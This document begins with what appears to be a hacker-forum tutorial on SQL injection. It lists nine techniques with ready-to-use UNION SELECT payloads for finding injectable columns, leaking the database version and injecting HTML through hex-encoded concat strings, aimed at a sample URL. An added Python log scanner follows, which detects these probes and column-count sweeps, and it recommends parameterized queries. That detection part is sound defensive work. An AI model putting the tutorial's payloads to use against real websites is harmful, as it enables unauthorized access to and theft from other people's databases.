- How to find Vulnerable Columns?
- ANS:-
- 1st Technique:-
- use -> id = -1 union select 1,2,3,4,5--
- use -> id = 1111/9999/null/bybysql union select 1,2,3,4,5--
- use -> id = .1/1.2/12.4 union select 1,2,3,4,5-- [Thanks to Crown sir]
- Note:- I use null and bybysql. Don't get confused by them; u can use whatever u like, meaning use things which don't exist [Thanks to Hack Forum]
- 2nd Technique :- False Parameter
- Here False Parameter means put something that makes a wrong response into our SQL PARAMETER like
- (a) 1=2, 1=0
- use -> id=1 or 1=2 union select 1,2,3,4,5--
- use -> id=1 or 1=0 union select 1,2,3,4,5--
- (b) We can also use having, like, <>
- use -> id=1 having/HAVING 1=2 union select 1,2,3,4,5--
- use -> id=1 1 like/LIKE 2 union select 1,2,3,4,5--
- use -> id=1 1 <> 1 union select 1,2,3,4,5--
- use -> id=1 {having/and} 1 like 2 union select 1,2,3,4,5--
- use -> id=1 {having/and} 1 <> 1 union select 1,2,3,4,5-- /* use either having or and
- (c) Also u can use and false/AND FALSE statement
- use -> id=1 and false union select 1,2,3,4,5--
- 3rd Technique :- Divide by 0 means -> /0 and +div+0
- use -> id =12/0 union select 1,2,3,4,5--
- use -> id = 12+div+0+ union select 1,2,3,4,5--
- 4th Technique :- Look closely, or scratch the HTML source code
- The number can potentially be displayed anywhere; when it's kind of rough, just change the query to make the whole thing more visible, to something like
- http://somesite.net/b.php?id=12/0 union select 1111,2222,3333,4444,5555--
- Above we use 1111 ,2222 instead of 1,2 respectively
- After writing dat code open source code then search the 'Column Number' like 1111,2222,3333,4444,5555 by using (CTRL+F :- For finding something in source code) Then check where is dat number appearing in source code
- Sometimes the number is displayed in the page title.
- When U get the vulnerable columns then u want to display the version,user,database or some html parts to visible on page So 4 dat Follow These Steps :-
- i.) id = -1 union select 1111,2222,concat(0x223e,@@version,0x3c696d67207372633d22),4444--
- Where
- 223e => ">
- 3c696d67207372633d22 => <img src="
- *Remember we use 0x so dat above hex code works
- ii.) 4 print our name
- id = -1 union select 1111,2222,concat(0x5c223e3c666f6e7420636f6c6f72203d207265642073697a653d343e41414b4153483c2f666f6e743e3c212d2d),4444--
- Where
- 0x5c223e3c666f6e7420636f6c6f72203d207265642073697a653d343e41414b4153483c2f666f6e743e3c212d2d => \"><font color = red size=4>AAKASH</font><!--
- 5th Technique :-
- U tried all above techniques but still can't get vulnerable column then u can also use this 5th technique.... Wats new in this technique See :-
- u can use union select 1,2,3,4,5-- as union (select 1,2,3,4,5)--
- use :- id=-2 union (select 1,2,3,4,5)--
- /* If u see vul col like 3 then
- use :- id=-2 union (select 1,2,333(4 check)/@@version,4,5)--
- 6th Technique :- True Parameter
- use -> id=1 +where+1=1 union select 1,2,3,4,5--
- use -> id=1 +and+50=50 union select 1,2,3,4,5--
- use -> id=1 =75=75 union select 1,2,3,4,5--
- 7th Technique :- Bruteforcing the column /* Thanks to My Master Devilhunter Dante
- Frnds when u can't find number of columns then u also can use this technique. By this technique not only u find number of columns u also get vulnerable columns.
- Follow the following steps
- 1st do -> union select 1--
- 2nd do -> union select 1,2--
- 3rd do -> union select 1,2,3--
- 4th do -> union select 1,2,3,4--
- 5th do -> union select 1,2,3,4,5--
- Do above steps until u can't get vulnerable columns :)
- 8th Technique :- Guessing which number is vulnerable
- suppose we have union select 1,2,3,4,5,6,7--
- Then replace numbers with any words u want like :-
- union select 'hello1','hello2','hello3','hello4','hello5' [Then convert 'hello1' in hex format] OR
- union select version(),version(),version(),version(),version() [No need to convert] OR
- union select :1,:2,:3,:4,:5,:6 [Then convert :1 in hex format. I think it is very easy to use and not confusing ]
- 9th Technique :- Using null
- Friends we can also use null to get vulnerable columns.
- See this :-
- union select 1,2,3,4,5,6,7--
- union select null,2,3,4,5,6,7-- Error [But if 1 is vulnerable den no error]
- union select 1,null,2,3,4,5,6,7-- Error "
- union select 1,2,null,3,4,5,6,7-- Error "
- union select 1,2,3,null,4,5,6,7-- No Error [Suppose if 4 is vulnerable den no error]
- union select 1,2,3,4,null,5,6,7--
- union select 1,2,3,4,5,null,6,7--
- union select 1,2,3,4,5,null,7--
- union select 1,2,3,4,5,6,null --
- Thanks and credit goes to
- 1. Blackhawk
- 2. Crown
- 3. BlackRoas
- 4. Benzi
- 5.Devilhunter Dante (My Teacher)
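Every technique above leaves the same trace in a web server access log: a UNION SELECT followed by a list of filler values, often repeated with one more column each time. The detector below is an added example, not part of the original paste; the log format (Common Log Format), the sample lines, the addresses and all function names are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# One filler "column" as used in the probes above: hex literal, number, null,
# quoted word, version(), @@variable, :N, or a concat(...) wrapper.
_COL = (r"(?:0x[0-9a-f]+|\d+(?:\.\d+)?|null|'[^']*'|version\(\)"
        r"|@@\w+|:\d+|concat\([^)]*\))")
UNION_PROBE = re.compile(
    r"union\s+(?:all\s+)?\(?\s*select\s+(" + _COL + r"(?:\s*,\s*" + _COL + r")*)",
    re.IGNORECASE)
# Client IP and request target from a Common Log Format line.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (\S+) ')

def union_probe_width(url):
    """Number of filler columns in a UNION SELECT probe, 0 if none is present."""
    m = UNION_PROBE.search(unquote_plus(url))  # decodes %20 and '+' to spaces
    return len(re.findall(_COL, m.group(1), re.IGNORECASE)) if m else 0

def scan(lines):
    """Map client IP -> sorted distinct probe widths seen in its requests."""
    widths = defaultdict(set)
    for line in lines:
        m = LOG_LINE.match(line)
        if m and (w := union_probe_width(m.group(2))):
            widths[m.group(1)].add(w)
    return {ip: sorted(ws) for ip, ws in widths.items()}

def is_sweep(widths, run=3):
    """True when widths hold `run` consecutive values (column-count brute force)."""
    return any(all(w + i in widths for i in range(run)) for w in widths)

T = "[01/Jan/2024:10:00:00 +0000]"  # constructed timestamp
SAMPLE_LOG = [  # constructed lines, documentation-range addresses
    f'192.0.2.10 - - {T} "GET /b.php?id=12 HTTP/1.1" 200 512',
    f'198.51.100.7 - - {T} "GET /b.php?id=-1+union+select+1-- HTTP/1.1" 500 90',
    f'198.51.100.7 - - {T} "GET /b.php?id=-1+union+select+1,2-- HTTP/1.1" 500 90',
    f'198.51.100.7 - - {T} "GET /b.php?id=-1%20UNION%20SELECT%201,2,3-- HTTP/1.1" 200 300',
    f'203.0.113.5 - - {T} "GET /b.php?id=1+and+false+union+(select+1111,2222,'
    f'concat(0x223e,@@version,0x3c),4444)-- HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, ws in scan(SAMPLE_LOG).items():
        print(ip, ws, "column-count sweep" if is_sweep(ws) else "union probe")
```

The pattern only decodes one layer of URL encoding and only sees the request line, so POST bodies and double-encoded parameters need the same check applied where they are logged. The root fix is still parameterized queries, which make every probe on this page inert.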